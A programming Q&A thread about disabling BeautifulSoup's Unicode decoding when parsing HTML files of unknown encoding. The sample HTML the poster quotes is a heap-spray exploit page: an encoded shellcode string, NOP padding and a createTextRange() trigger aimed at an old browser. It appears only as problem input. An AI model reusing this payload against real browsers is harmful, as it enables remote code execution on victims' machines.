# Is there any way to disable BeautifulSoup's Unicode decoding?

Tags: python, html, web-scraping, beautifulsoup

I'm trying to scrape a large amount of HTML files of unknown encodings. I chose the BeautifulSoup over the lxml parser because it's fast and has an easy API, but I find that it does not always manage to parse files due to its attempts to decode them as Unicode.

Now, I don't necessarily need it to decode the text in the HMTL, but rather identify the structure of the DOM and the included tags; if they contain more data I prefer to decode it myself.
I've tried excluding some encodings to overcome this problem, but this also doesn't always work.

Can this feature be disabled in some way?

Here's the base for my parser:

from bs4 import BeautifulSoup, Comment, Tag

```
class HTMLParser():
    def __init__(self, data, exclude_encodings=None):
        self.html_tree = BeautifulSoup(data, 'lxml', exclude_encodings=exclude_encodings)
        self._tag_handlers = dict()

    def start(self):
        for node in self.html_tree.recursiveChildGenerator():
            if isinstance(node, Tag):
                if node.name in self._tag_handlers and self._tag_handlers[node.name] is not None:
                    self._tag_handlers[node.name](node)
            elif isinstance(node, Comment):
                self._handle_comment(node)
```

Tag handlers are loaded accordingly to what's needed to be parsed and how.

Also, here is a sample of the html that's causing the problem:

```
<html> <head> <script language="javascript"> var shellcode_str = "}yÒüiõ—·BxC‘¾¿f±© Ñâ=*ù²|4{öã'uH@ ™´˜°q$áv?gN›’Ö¨%5I ,Ÿ(Ô“¸O-µA¶sFº‡øq!ë|+ü»~x'J¹B—¸=¶¾’“F9Õ·÷Ö/r?7CzNI:â$@ù–™wpg„ýf˜±A4º´²›%‘¨µy{ õt³,¿©O°v5GãþÀá2ÐÔ- K1à}<ŸuHyutB¿´ ø@kÔ²™‘˜¾»’CA#õ|fë?ý"ü-I ÖÓá/¶x7N,†ùwvzg}€â~ ¹%=±ºJ›sp'Ÿr5°¨H–4“ Kµ<ˆÕ— à$³©G{FqO¸·‰ã?Af·wq)ÿÇÆÁø–;á3ü{Nz ù…ë-~H¨›±º ³vu=C°0â}àtK™@¸$<¹©¶GJ¾|xg%Ÿ“B´’‘µsy ²p41Ö˜#Ô/ý;ãO—ÕI,»'F¿õr75†àköÀâzHu}KŒë Ÿp"á*÷ãv/´rO·~qf³’A ˜¹±B7=+Õ¿—C4N‡ø°»‘st,{F¾©IyÐÔƒý™g¸x5$%–|'“G-@?Jwõ0üº²¶›¨µ< ÓÖ„ùs w<¿°˜¸t âgCf7?¹»,(Ñãz} Òà¾3Ô¶´—Jº–%{Õ³·Ÿëý:õ±™µ“©u~pyvI’¨ø/GrFKqáH|)Ö!Áù‘…üxNzOq'u=²›{As8á$~5}4yàB|9ã@-™âCvÖtw4¾K» ü·F¿‘iý€õˆø7¶Jp›ºr x%µ“¹2ëGf‰ùB±5?© ˜/-¨’@O–=ŸÔ°—¸,²g³$<I´Õ'ANHÙÈÙt$ô¸ØÉZ•[+É±H1CƒëüCâ-5²ÍÆC|D#r®2''~1eÄõž_{¿‘è6™œéö%r)˜Ù‰~zàAs{%¿|)þË/Þ‹ŽóUÇt‰Uªyužò<¸œ9ö3VÉ ’§28Úk ô×rI3¡Gµr5a”gâL&ÈƒŸ@0LûLŸs,ÅÛWè¸ö©kn©ÔÏ­¡÷ØëŸéè`f{gR)×ïÞ¢ñè!™EfÜ"µ®våØŠ÷n2" Iœ€9\NhPS±ˆ[¹Ú"¡*ï²©¸‡°©­ =O§£kÇP]6“Á¢íÙÂ)ŒÙl y*;o,5–Ñ£†[èáÃáßyÍw 2— ædý ŽÐ¥r«pç`‹z^Ô\j½Ÿfj‚IOèòÿ£0"; var nop_str = "ùHA"; var shellcode_total_length = 20 + shellcode_str.length; while(nop_str.length < shellcode_total_length) { nop_str += nop_str; } var nop_final = nop_str.substring(0,shellcode_total_length); var remaining_nops = nop_str.substring(0,nop_str.length-shellcode_total_length); while(remaining_nops.length + shellcode_total_length < 0x40000) { remaining_nops += nop_final; } var arr = new Array(); var counter = 0; var max_size = 2020; function func() { spain_id.innerHTML = Math.round((counter / max_size) * 100); if(counter < max_size) { arr.push(remaining_nops + shellcode_str); counter++; } else { spain_id.innerHTML = 100; element = document.createElement("input"); element.type = "image"; _FDPS = element.createTextRange(); } } function interval_func() { setInterval('func()', 5) } </script>
```

What happens is that the BeautifulSoup object is parsed without any children, even though it clearly has a script node, and so my start method is ineffective.

Comment: You cannot parse "the tags only". HTML is a string. To know which parts of the string are elements, and which parts are text, the whole thing must be parsed. Show the code you are currently using.

Comment: just curious, @leozippin are you using linux?

Comment: @ewwink yes, I'm using debian.

Comment: in some case, bs4 have problem with windows encoding in linux. and there is no option to disable except you edit the core of bs4.

Comment: Don't believe hand-wavy "it's not possible" statements. Show the code you are currently using.

Comment: @Tomalak, I've provided the code and the problematic HTML

Comment: The part that actually reads the files is important, but it's missing from your example.

Comment: @Tomalak, the data passed to my class is either a file descriptor, or a string (as BS supports both). Where I find the problem is when trying to go over the children with recursiveChildGenerator, a StopIteration is immediately raised  (and that is after excluding ISO-8859-7. If parsed with no exclusions the parser simply crashes)

Comment: *Are* your documents actually misinterpreted as `ISO-8859-7` or are you just sprinkling fairy dust? What encoding are your files in, overall, and what encodings are they being interpreted as when detection fails - have you cross-checked that? Also, when you `open()` the files as a certain encoding and read them into a string then BeautifulSoup does not need to guess anymore.

Comment: `believe me "it's not possible" to read the file correctly without correct encoding` but it the truth but I'm not saying like that, I'm saying, once again no option in bs4 to disable decoding/encoding

Comment: maybe you can disable it just add all known encoding in `exclude_encodings`

Comment: It seems that when I ignore decoding errors when opening the file BeautifulSoup manages to carry on.
I guess the problem in the specific sample I gave was that the HTML file was not decoded correctly, and when BeautifulSoup attempted to read its contents it caused some failure (though, not always an exception, if ISO-8859-7 encoding were excluded)